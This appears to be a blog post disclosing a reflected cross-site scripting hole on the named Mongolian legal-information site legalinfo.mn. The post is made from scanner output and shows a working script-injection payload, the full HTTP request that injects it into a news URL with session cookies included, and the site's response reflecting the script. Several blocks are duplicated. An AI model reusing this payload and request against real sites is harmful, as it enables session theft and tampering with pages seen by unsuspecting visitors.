Legalinfo.mn XSS CROSS SITE SCRIPTING
 |
| Баталгаат зураг үзэх |
Target : legalinfo.mn
Detected vulnerability : XSS
Vulnerabilities : Important 22% Low 38% Information 39%
Scan detials :
SQL Injection, SQL Injection (Boolean), SQL
Injection (Blind), Cross-site Scripting,
Command Injection, Command Injection (Blind),
Local File Inclusion, Remote File Inclusion,
Remote Code Evaluation, HTTP Header Injection,
Open Redirection, Expression Language
Injection, Web App Fingerprint, RoR Code
Execution, WebDAV
Injection (Blind), Cross-site Scripting,
Command Injection, Command Injection (Blind),
Local File Inclusion, Remote File Inclusion,
Remote Code Evaluation, HTTP Header Injection,
Open Redirection, Expression Language
Injection, Web App Fingerprint, RoR Code
Execution, WebDAV
Vulnerability information : http://en.wikipedia.org/wiki/Cross-site_scripting
Баталгаажсан параметр
Parameter Type Value
URI-BASED Full URL '"--></style></scRipt>
<scRipt>alert(X-code™ by Zev1337)</scRipt>
Parameter Type Value
URI-BASED Full URL '"--></style></scRipt>
<scRipt>alert(X-code™ by Zev1337)</scRipt>
Request
GET /news/159'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3EGotivism(0x0003BA)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Referer: http://www.legalinfo.mn/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Gotivism)
Accept-Language: en-us,en;q=0.5
X-Scanner: Gotivism
Host: www.legalinfo.mn
Cookie: cd2c89acf4e6e28f300ba7d00a7d9a9f=j4ar7s99uoo7brkbslb3drdc91; PHPSESSID=ei2t1sgfrpgomd36m82pvjmnk2
Accept-Encoding: gzip, deflate
Response
…
/span>, <span class="tsaaral">5</span>, <span class="tsaaral">6</span>, <span class="tsaaral">7</span>, <span class="tsaaral">8</span>, <span class="tsaaral">9</span>, <a
class="wblue" href="/news/159'"--></style></scRipt><scRipt>Gotivism 1.0(X-code™ by Zev1337)</scRipt>?filter=all">Бүгд</a><br /><br />
<!--<input name="sdate" id="sdate" value=""/> -->
<!--<input name="edate" id="edate" value=""/><br /><br /> -->
<div id="mright">
<…
GET /news/159'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3EGotivism(0x0003BA)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Referer: http://www.legalinfo.mn/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Gotivism)
Accept-Language: en-us,en;q=0.5
X-Scanner: Gotivism
Host: www.legalinfo.mn
Cookie: cd2c89acf4e6e28f300ba7d00a7d9a9f=j4ar7s99uoo7brkbslb3drdc91; PHPSESSID=ei2t1sgfrpgomd36m82pvjmnk2
Accept-Encoding: gzip, deflate
Response
…
/span>, <span class="tsaaral">5</span>, <span class="tsaaral">6</span>, <span class="tsaaral">7</span>, <span class="tsaaral">8</span>, <span class="tsaaral">9</span>, <a
class="wblue" href="/news/159'"--></style></scRipt><scRipt>Gotivism 1.0(X-code™ by Zev1337)</scRipt>?filter=all">Бүгд</a><br /><br />
<!--<input name="sdate" id="sdate" value=""/> -->
<!--<input name="edate" id="edate" value=""/><br /><br /> -->
<div id="mright">
<…
No comments:
Post a Comment